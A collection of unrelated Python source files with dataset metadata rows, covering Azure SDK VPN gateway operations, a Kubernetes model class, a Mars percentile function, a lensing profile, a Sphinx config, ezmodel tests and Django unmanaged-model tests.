map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('P2SVpnGateway', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_get_p2_s_vpn_connection_health_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/p2svpnGateways/{gatewayName}/getP2sVpnConnectionHealth'} # type: ignore
def begin_get_p2_s_vpn_connection_health(
self,
resource_group_name, # type: str
gateway_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.P2SVpnGateway"]
"""Gets the connection health of P2S clients of the virtual wan P2SVpnGateway in the specified
resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param gateway_name: The name of the P2SVpnGateway.
:type gateway_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the ARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either P2SVpnGateway or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2019_09_01.models.P2SVpnGateway]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.P2SVpnGateway"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._get_p2_s_vpn_connection_health_initial(
resource_group_name=resource_group_name,
gateway_name=gateway_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('P2SVpnGateway', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_get_p2_s_vpn_connection_health.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/p2svpnGateways/{gatewayName}/getP2sVpnConnectionHealth'} # type: ignore
def _get_p2_s_vpn_connection_health_detailed_initial(
self,
resource_group_name, # type: str
gateway_name, # type: str
request, # type: "_models.P2SVpnConnectionHealthRequest"
**kwargs # type: Any
):
# type: (...) -> Optional["_models.P2SVpnConnectionHealth"]
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.P2SVpnConnectionHealth"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._get_p2_s_vpn_connection_health_detailed_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(request, 'P2SVpnConnectionHealthRequest')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('P2SVpnConnectionHealth', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_get_p2_s_vpn_connection_health_detailed_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/p2svpnGateways/{gatewayName}/getP2sVpnConnectionHealthDetailed'} # type: ignore
def begin_get_p2_s_vpn_connection_health_detailed(
self,
resource_group_name, # type: str
gateway_name, # type: str
request, # type: "_models.P2SVpnConnectionHealthRequest"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.P2SVpnConnectionHealth"]
"""Gets the sas url to get the connection health detail of P2S clients of the virtual wan
P2SVpnGateway in the specified resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param gateway_name: The name of the P2SVpnGateway.
:type gateway_name: str
:param request: Request parameters supplied to get p2s vpn connections detailed health.
:type request: ~azure.mgmt.network.v2019_09_01.models.P2SVpnConnectionHealthRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the ARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either P2SVpnConnectionHealth or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2019_09_01.models.P2SVpnConnectionHealth]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.P2SVpnConnectionHealth"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._get_p2_s_vpn_connection_health_detailed_initial(
resource_group_name=resource_group_name,
gateway_name=gateway_name,
request=request,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('P2SVpnConnectionHealth', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_get_p2_s_vpn_connection_health_detailed.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/p2svpnGateways/{gatewayName}/getP2sVpnConnectionHealthDetailed'} # type: ignore
| 50.277897 | 248 | 0.667556 |
fee121e91f15c0fb122ff98f7dadff1010d8f474 | 3,958 | py | Python | kubernetes/client/models/v1_secret_reference.py | anemerovsky-essextec/python | 6e40b9169b27c3f1f9422c0f6dd1cd9caef8d57c | [
"Apache-2.0"
] | null | null | null | kubernetes/client/models/v1_secret_reference.py | anemerovsky-essextec/python | 6e40b9169b27c3f1f9422c0f6dd1cd9caef8d57c | [
"Apache-2.0"
] | null | null | null | kubernetes/client/models/v1_secret_reference.py | anemerovsky-essextec/python | 6e40b9169b27c3f1f9422c0f6dd1cd9caef8d57c | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.12.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1SecretReference(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'name': 'str',
'namespace': 'str'
}
attribute_map = {
'name': 'name',
'namespace': 'namespace'
}
def __init__(self, name=None, namespace=None):
"""
V1SecretReference - a model defined in Swagger
"""
self._name = None
self._namespace = None
self.discriminator = None
if name is not None:
self.name = name
if namespace is not None:
self.namespace = namespace
@property
def name(self):
"""
Gets the name of this V1SecretReference.
Name is unique within a namespace to reference a secret resource.
:return: The name of this V1SecretReference.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this V1SecretReference.
Name is unique within a namespace to reference a secret resource.
:param name: The name of this V1SecretReference.
:type: str
"""
self._name = name
@property
def namespace(self):
"""
Gets the namespace of this V1SecretReference.
Namespace defines the space within which the secret name must be unique.
:return: The namespace of this V1SecretReference.
:rtype: str
"""
return self._namespace
@namespace.setter
def namespace(self, namespace):
"""
Sets the namespace of this V1SecretReference.
Namespace defines the space within which the secret name must be unique.
:param namespace: The namespace of this V1SecretReference.
:type: str
"""
self._namespace = namespace
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1SecretReference):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 25.535484 | 105 | 0.555584 |
f023956c3093611564ed32065189f13dc835a269 | 6,015 | py | Python | mars/tensor/statistics/percentile.py | hxri/mars | f7864f00911883b94800b63856f0e57648d3d9b4 | [
"Apache-2.0"
] | 2,413 | 2018-12-06T09:37:11.000Z | 2022-03-30T15:47:39.000Z | mars/tensor/statistics/percentile.py | hxri/mars | f7864f00911883b94800b63856f0e57648d3d9b4 | [
"Apache-2.0"
] | 1,335 | 2018-12-07T03:06:18.000Z | 2022-03-31T11:45:57.000Z | mars/tensor/statistics/percentile.py | hxri/mars | f7864f00911883b94800b63856f0e57648d3d9b4 | [
"Apache-2.0"
] | 329 | 2018-12-07T03:12:41.000Z | 2022-03-29T21:49:57.000Z | # Copyright 1999-2021 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
from ...core import ENTITY_TYPE
from ..arithmetic import truediv
from .quantile import _quantile_unchecked, _quantile_is_valid
q_error_msg = "Percentiles must be in the range [0, 100]"
def percentile(a, q, axis=None, out=None, overwrite_input=False,
interpolation='linear', keepdims=False):
"""
Compute the q-th percentile of the data along the specified axis.
Returns the q-th percentile(s) of the array elements.
Parameters
----------
a : array_like
Input tensor or object that can be converted to a tensor.
q : array_like of float
Percentile or sequence of percentiles to compute, which must be between
0 and 100 inclusive.
axis : {int, tuple of int, None}, optional
Axis or axes along which the percentiles are computed. The
default is to compute the percentile(s) along a flattened
version of the tensor.
out : ndarray, optional
Alternative output array in which to place the result. It must
have the same shape and buffer length as the expected output,
but the type (of the output) will be cast if necessary.
overwrite_input : bool, optional
Just for compatibility with Numpy, would not take effect.
interpolation : {'linear', 'lower', 'higher', 'midpoint', 'nearest'}
This optional parameter specifies the interpolation method to
use when the desired percentile lies between two data points
``i < j``:
* 'linear': ``i + (j - i) * fraction``, where ``fraction``
is the fractional part of the index surrounded by ``i``
and ``j``.
* 'lower': ``i``.
* 'higher': ``j``.
* 'nearest': ``i`` or ``j``, whichever is nearest.
* 'midpoint': ``(i + j) / 2``.
keepdims : bool, optional
If this is set to True, the axes which are reduced are left in
the result as dimensions with size one. With this option, the
result will broadcast correctly against the original array `a`.
Returns
-------
percentile : scalar or ndarray
If `q` is a single percentile and `axis=None`, then the result
is a scalar. If multiple percentiles are given, first axis of
the result corresponds to the percentiles. The other axes are
the axes that remain after the reduction of `a`. If the input
contains integers or floats smaller than ``float64``, the output
data-type is ``float64``. Otherwise, the output data-type is the
same as that of the input. If `out` is specified, that array is
returned instead.
See Also
--------
mean
median : equivalent to ``percentile(..., 50)``
nanpercentile
quantile : equivalent to percentile, except with q in the range [0, 1].
Notes
-----
Given a vector ``V`` of length ``N``, the q-th percentile of
``V`` is the value ``q/100`` of the way from the minimum to the
maximum in a sorted copy of ``V``. The values and distances of
the two nearest neighbors as well as the `interpolation` parameter
will determine the percentile if the normalized ranking does not
match the location of ``q`` exactly. This function is the same as
the median if ``q=50``, the same as the minimum if ``q=0`` and the
same as the maximum if ``q=100``.
Examples
--------
>>> import mars.tensor as mt
>>> a = mt.array([[10, 7, 4], [3, 2, 1]])
>>> a.execute()
array([[10, 7, 4],
[ 3, 2, 1]])
>>> mt.percentile(a, 50).execute()
3.5
>>> mt.percentile(a, 50, axis=0).execute()
array([6.5, 4.5, 2.5])
>>> mt.percentile(a, 50, axis=1).execute()
array([7., 2.])
>>> mt.percentile(a, 50, axis=1, keepdims=True).execute()
array([[7.],
[2.]])
>>> m = mt.percentile(a, 50, axis=0)
>>> out = mt.zeros_like(m)
>>> mt.percentile(a, 50, axis=0, out=out).execute()
array([6.5, 4.5, 2.5])
>>> m.execute()
array([6.5, 4.5, 2.5])
The different types of interpolation can be visualized graphically:
.. plot::
import matplotlib.pyplot as plt
import mars.tensor as mt
import numpy as np
a = mt.arange(4)
p = mt.linspace(0, 100, 6001)
ax = plt.gca()
lines = [
('linear', None),
('higher', '--'),
('lower', '--'),
('nearest', '-.'),
('midpoint', '-.'),
]
for interpolation, style in lines:
ax.plot(
np.asarray(p), np.asarray(mt.percentile(a, p, interpolation=interpolation)),
label=interpolation, linestyle=style)
ax.set(
title='Interpolation methods for list: ' + str(a),
xlabel='Percentile',
ylabel='List item returned',
yticks=np.asarray(a))
ax.legend()
plt.show()
"""
if not isinstance(q, ENTITY_TYPE):
q = np.asanyarray(q)
q = np.true_divide(q, 100)
# do check instantly if q is not a tensor
if not _quantile_is_valid(q):
raise ValueError(q_error_msg)
else:
q = truediv(q, 100)
return _quantile_unchecked(a, q, axis=axis, out=out, overwrite_input=overwrite_input,
interpolation=interpolation, keepdims=keepdims,
q_error_msg=q_error_msg)
| 36.90184 | 92 | 0.609643 |
c36f9f7f9418e2f2919b628f31db8666f993916d | 6,483 | py | Python | lenstronomy/LensModel/Profiles/spp.py | jiwoncpark/lenstronomy | c1d12580f8d8cf1d065d80568a58c0694e23945a | [
"MIT"
] | 1 | 2020-07-31T07:55:17.000Z | 2020-07-31T07:55:17.000Z | lenstronomy/LensModel/Profiles/spp.py | jiwoncpark/lenstronomy | c1d12580f8d8cf1d065d80568a58c0694e23945a | [
"MIT"
] | null | null | null | lenstronomy/LensModel/Profiles/spp.py | jiwoncpark/lenstronomy | c1d12580f8d8cf1d065d80568a58c0694e23945a | [
"MIT"
] | 2 | 2020-10-26T10:45:11.000Z | 2021-03-04T12:25:19.000Z | __author__ = 'sibirrer'
import numpy as np
import scipy.special as special
from lenstronomy.LensModel.Profiles.base_profile import LensProfileBase
class SPP(LensProfileBase):
"""
class for circular power-law mass distribution
"""
param_names = ['theta_E', 'gamma', 'center_x', 'center_y']
lower_limit_default = {'theta_E': 0, 'gamma': 1.5, 'center_x': -100, 'center_y': -100}
upper_limit_default = {'theta_E': 100, 'gamma': 2.5, 'center_x': 100, 'center_y': 100}
def function(self, x, y, theta_E, gamma, center_x=0, center_y=0):
"""
:param x: set of x-coordinates
:type x: array of size (n)
:param theta_E: Einstein radius of lens
:type theta_E: float.
:param gamma: power law slope of mass profile
:type gamma: <2 float
:returns: function
:raises: AttributeError, KeyError
"""
gamma = self._gamma_limit(gamma)
x_ = x - center_x
y_ = y - center_y
E = theta_E / ((3. - gamma) / 2.) ** (1. / (1. - gamma))
# E = phi_E_spp
eta= -gamma + 3
p2 = x_**2+y_**2
s2 = 0. # softening
return 2 * E**2/eta**2 * ((p2 + s2)/E**2)**(eta/2)
def derivatives(self, x, y, theta_E, gamma, center_x=0., center_y=0.):
gamma = self._gamma_limit(gamma)
xt1 = x - center_x
xt2 = y - center_y
r2 = xt1*xt1+xt2*xt2
a = np.maximum(r2, 0.000001)
r = np.sqrt(a)
alpha = theta_E * (r2/theta_E**2) ** (1 - gamma/2.)
fac = alpha/r
f_x = fac*xt1
f_y = fac*xt2
return f_x, f_y
def hessian(self, x, y, theta_E, gamma, center_x=0., center_y=0.):
gamma = self._gamma_limit(gamma)
xt1 = x - center_x
xt2 = y - center_y
E = theta_E / ((3. - gamma) / 2.) ** (1. / (1. - gamma))
# E = phi_E_spp
eta = -gamma + 3.
P2 = xt1**2+xt2**2
if isinstance(P2, int) or isinstance(P2, float):
a = max(0.000001,P2)
else:
a=np.empty_like(P2)
p2 = P2[P2>0] #in the SIS regime
a[P2==0] = 0.000001
a[P2>0] = p2
kappa = 1./eta*(a/E**2)**(eta/2-1)*((eta-2)*(xt1**2+xt2**2)/a+(1+1))
gamma1 = 1./eta*(a/E**2)**(eta/2-1)*((eta/2-1)*(2*xt1**2-2*xt2**2)/a)
gamma2 = 4*xt1*xt2*(1./2-1/eta)*(a/E**2)**(eta/2-2)/E**2
f_xx = kappa + gamma1
f_yy = kappa - gamma1
f_xy = gamma2
return f_xx, f_yy, f_xy
@staticmethod
def rho2theta(rho0, gamma):
"""
converts 3d density into 2d projected density parameter
:param rho0:
:param gamma:
:return:
"""
fac = np.sqrt(np.pi) * special.gamma(1. / 2 * (-1 + gamma)) / special.gamma(gamma / 2.) * 2 / (3 - gamma) * rho0
#fac = theta_E**(gamma - 1)
theta_E = fac**(1. / (gamma - 1))
return theta_E
@staticmethod
def theta2rho(theta_E, gamma):
"""
converts projected density parameter (in units of deflection) into 3d density parameter
:param theta_E:
:param gamma:
:return:
"""
fac1 = np.sqrt(np.pi) * special.gamma(1. / 2 * (-1 + gamma)) / special.gamma(gamma / 2.) * 2 / (3 - gamma)
fac2 = theta_E**(gamma - 1)
rho0 = fac2 / fac1
return rho0
@staticmethod
def mass_3d(r, rho0, gamma):
"""
mass enclosed a 3d sphere or radius r
:param r:
:param a:
:param s:
:return:
"""
mass_3d = 4 * np.pi * rho0 /(-gamma + 3) * r ** (-gamma + 3)
return mass_3d
def mass_3d_lens(self, r, theta_E, gamma):
"""
:param r:
:param theta_E:
:param gamma:
:return:
"""
rho0 = self.theta2rho(theta_E, gamma)
return self.mass_3d(r, rho0, gamma)
def mass_2d(self, r, rho0, gamma):
"""
mass enclosed projected 2d sphere of radius r
:param r:
:param rho0:
:param a:
:param s:
:return:
"""
alpha = np.sqrt(np.pi) * special.gamma(1. / 2 * (-1 + gamma)) / special.gamma(gamma / 2.) * r ** (2 - gamma)/(3 - gamma) *np.pi * 2 * rho0
mass_2d = alpha*r
return mass_2d
def mass_2d_lens(self, r, theta_E, gamma):
"""
:param r: projected radius
:param theta_E: Einstein radius
:param gamma: power-law slope
:return: 2d projected radius enclosed
"""
rho0 = self.theta2rho(theta_E, gamma)
return self.mass_2d(r, rho0, gamma)
def grav_pot(self, x, y, rho0, gamma, center_x=0, center_y=0):
"""
gravitational potential (modulo 4 pi G and rho0 in appropriate units)
:param x:
:param y:
:param rho0:
:param a:
:param s:
:param center_x:
:param center_y:
:return:
"""
x_ = x - center_x
y_ = y - center_y
r = np.sqrt(x_**2 + y_**2)
mass_3d = self.mass_3d(r, rho0, gamma)
pot = mass_3d/r
return pot
@staticmethod
def density(r, rho0, gamma):
"""
computes the density
:param x:
:param y:
:param rho0:
:param a:
:param s:
:return:
"""
rho = rho0 / r**gamma
return rho
def density_lens(self, r, theta_E, gamma):
"""
computes the density at 3d radius r given lens model parameterization.
The integral in projected in units of angles (i.e. arc seconds) results in the convergence quantity.
"""
rho0 = self.theta2rho(theta_E, gamma)
return self.density(r, rho0, gamma)
@staticmethod
def density_2d(x, y, rho0, gamma, center_x=0, center_y=0):
"""
projected density
:param x:
:param y:
:param rho0:
:param a:
:param s:
:param center_x:
:param center_y:
:return:
"""
x_ = x - center_x
y_ = y - center_y
r = np.sqrt(x_**2 + y_**2)
sigma = np.sqrt(np.pi) * special.gamma(1./2*(-1+gamma))/special.gamma(gamma/2.) * r**(1-gamma) * rho0
return sigma
@staticmethod
def _gamma_limit(gamma):
"""
limits the power-law slope to certain bounds
:param gamma: power-law slope
:return: bounded power-law slopte
"""
return gamma
| 28.685841 | 146 | 0.518896 |
b8f5ca62b55f214730bf24e33e3a4af325b39862 | 3,249 | py | Python | openstack-placement-1.0.0/api-ref/source/conf.py | scottwedge/OpenStack-Stein | 7077d1f602031dace92916f14e36b124f474de15 | [
"Apache-2.0"
] | null | null | null | openstack-placement-1.0.0/api-ref/source/conf.py | scottwedge/OpenStack-Stein | 7077d1f602031dace92916f14e36b124f474de15 | [
"Apache-2.0"
] | 5 | 2019-08-14T06:46:03.000Z | 2021-12-13T20:01:25.000Z | openstack-placement-1.0.0/api-ref/source/conf.py | scottwedge/OpenStack-Stein | 7077d1f602031dace92916f14e36b124f474de15 | [
"Apache-2.0"
] | 2 | 2018-08-23T00:07:14.000Z | 2018-08-27T10:10:02.000Z | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# placement-api-ref documentation build configuration file, created by
# sphinx-quickstart on Sat May 1 15:17:47 2010.
#
# This file is execfile()d with the current directory set to
# its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
import pbr.version
version_info = pbr.version.VersionInfo('placement')
sys.path.insert(0, os.path.abspath('../'))
extensions = [
'openstackdocstheme',
'os_api_ref',
'ext.validator',
]
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Placement API Reference'
copyright = u'2010-present, OpenStack Foundation'
# openstackdocstheme options
repository_name = 'openstack/placement'
use_storyboard = True
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The full version, including alpha/beta/rc tags.
release = version_info.release_string()
# The short X.Y version.
version = version_info.version_string()
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
html_theme = 'openstackdocs'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
"sidebar_mode": "toc",
}
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%Y-%m-%d %H:%M'
# -- Options for LaTeX output -------------------------------------------------
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'Placement.tex', u'OpenStack Placement API Documentation',
u'OpenStack Foundation', 'manual'),
]
# -- Options for openstackdocstheme -------------------------------------------
openstack_projects = [
'placement',
]
| 31.543689 | 79 | 0.700523 |
7479a986334cf911345532f80bba6314495d33be | 2,640 | py | Python | tests/test_regularization_plot.py | UBC-MDS/ezmodel | 66f7d38c41778c65bbdbec85533c496bb796be47 | [
"MIT"
] | 3 | 2018-02-15T01:31:50.000Z | 2018-03-03T18:56:45.000Z | tests/test_regularization_plot.py | UBC-MDS/ezmodel | 66f7d38c41778c65bbdbec85533c496bb796be47 | [
"MIT"
] | 15 | 2018-02-15T01:38:55.000Z | 2018-03-24T19:31:51.000Z | tests/test_regularization_plot.py | UBC-MDS/ezmodel | 66f7d38c41778c65bbdbec85533c496bb796be47 | [
"MIT"
] | null | null | null | import pytest
import numpy as np
from sklearn.linear_model import Ridge, Lasso, LogisticRegression, LinearRegression
from sklearn.datasets import load_boston, load_breast_cancer
from ezmodel.ezmodel import regularization_plot
def test_input_model_type():
"""Checks TypeError is raised when input model isn't of allowed type."""
X, y = load_boston(return_X_y=True)
with pytest.raises(TypeError):
regularization_plot(LinearRegression(), alpha=1, x=X, y=y)
def test_nonzero_count_ridge():
"""Checks using list for alpha with Ridge() outputs correct coefficient counts."""
X, y = load_boston(return_X_y=True)
tol=1e-2
alpha_range = [2**i for i in range(-2, 3)]
ridge_models = [Ridge(alpha=a).fit(X,y) for a in alpha_range]
nz_count = [sum(np.abs(m.coef_)>tol) for m in ridge_models]
assert nz_count == regularization_plot(Ridge(), alpha=alpha_range, tol=tol, x=X, y=y)
def test_nonzero_count_lasso():
"""Checks using list for alpha with Lasso() outputs correct coefficient counts."""
X, y = load_boston(return_X_y=True)
tol=1e-6
alpha_range = [2**i for i in range(-2, 3)]
lasso_models = [Lasso(alpha=a).fit(X,y) for a in alpha_range]
nz_count = [sum(np.abs(m.coef_)>tol) for m in lasso_models]
assert nz_count == regularization_plot(Lasso(), alpha=alpha_range, tol=tol, x=X, y=y)
def test_nonzero_count_logistic():
"""Checks using list for alpha with LogisticRegression() outputs correct coefficient counts."""
X, y = load_breast_cancer(return_X_y=True)
tol=1e-5
C_range = [2**i for i in range(-2, 3)]
log_models = [LogisticRegression(C=k).fit(X,y) for k in C_range]
nz_count = [sum(np.abs(m.coef_[0])>tol) for m in log_models]
assert nz_count == regularization_plot(LogisticRegression(), alpha=C_range, tol=tol, x=X, y=y)
def test_nonzero_coefs_logistic():
"""Checks using int for alpha produces correct coefficients for LogisticRegression() model."""
X, y = load_breast_cancer(return_X_y=True)
tol=1e-7
mod = LogisticRegression(C=10.0**-7).fit(X,y)
mod_coefs = mod.coef_[0]
mod_coefs = [np.abs(c) if c>tol else 0 for c in mod_coefs]
assert mod_coefs == regularization_plot(LogisticRegression(), alpha=10.0**7, x=X, y=y)
def test_nonzero_coefs_rigde():
"""Checks using float for alpha produces correct coefficients for Ridge() model."""
X, y = load_boston(return_X_y=True)
tol=1e-6
mod=Ridge(alpha=2**2.0).fit(X,y)
mod_coefs = mod.coef_
mod_coefs = [np.abs(c) if c>tol else 0 for c in mod_coefs]
assert mod_coefs == regularization_plot(Ridge(), alpha=2**2.0, x=X, y=y)
| 40.615385 | 99 | 0.704167 |
bfbd5447f293c90d5faa94ba91266c9c7c3ef7d5 | 3,476 | py | Python | tests/modeltests/unmanaged_models/models.py | yarko/django | 90b6240c8753ece3e52cafc37e1088b0646b843f | [
"BSD-3-Clause"
] | 1 | 2016-03-02T01:21:34.000Z | 2016-03-02T01:21:34.000Z | tests/modeltests/unmanaged_models/models.py | yarko/django | 90b6240c8753ece3e52cafc37e1088b0646b843f | [
"BSD-3-Clause"
] | null | null | null | tests/modeltests/unmanaged_models/models.py | yarko/django | 90b6240c8753ece3e52cafc37e1088b0646b843f | [
"BSD-3-Clause"
] | null | null | null | """
Models can have a ``managed`` attribute, which specifies whether the SQL code
is generated for the table on various manage.py operations.
"""
from django.db import models
# All of these models are created in the database by Django.
class A01(models.Model):
f_a = models.CharField(max_length=10, db_index=True)
f_b = models.IntegerField()
class Meta:
db_table = 'A01'
def __unicode__(self):
return self.f_a
class B01(models.Model):
fk_a = models.ForeignKey(A01)
f_a = models.CharField(max_length=10, db_index=True)
f_b = models.IntegerField()
class Meta:
db_table = 'B01'
# 'managed' is True by default. This tests we can set it explicitly.
managed = True
def __unicode__(self):
return self.f_a
class C01(models.Model):
mm_a = models.ManyToManyField(A01, db_table='D01')
f_a = models.CharField(max_length=10, db_index=True)
f_b = models.IntegerField()
class Meta:
db_table = 'C01'
def __unicode__(self):
return self.f_a
# All of these models use the same tables as the previous set (they are shadows
# of possibly a subset of the columns). There should be no creation errors,
# since we have told Django they aren't managed by Django.
class A02(models.Model):
f_a = models.CharField(max_length=10, db_index=True)
class Meta:
db_table = 'A01'
managed = False
def __unicode__(self):
return self.f_a
class B02(models.Model):
class Meta:
db_table = 'B01'
managed = False
